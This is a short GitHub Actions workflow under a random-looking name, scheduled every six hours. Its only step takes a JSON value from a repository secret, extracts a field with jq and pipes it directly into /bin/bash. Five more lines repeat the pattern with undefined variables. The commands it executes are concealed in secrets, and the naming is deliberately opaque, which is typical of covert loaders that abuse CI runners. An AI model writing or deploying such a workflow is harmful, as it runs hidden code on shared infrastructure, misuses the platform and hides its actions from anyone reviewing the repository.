name: bathroomgelding

on:
  workflow_dispatch:
  schedule:
    - cron: '35 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: bathroomgelding
        env:
          na5655: ${{ secrets.na5655 }}
        run: |
          echo $na5655 | jq -r .normi20989 | /bin/bash
          echo $tq7 | jq -r .sjpw29311 | /bin/bash
          echo $kxc27746 | jq -r .veh697 | /bin/bash
          echo $fwiz85 | jq -r .rj021 | /bin/bash
          echo $gjj15988 | jq -r .ibkq40 | /bin/bash
          echo $z54142 | jq -r .okc95324 | /bin/bash

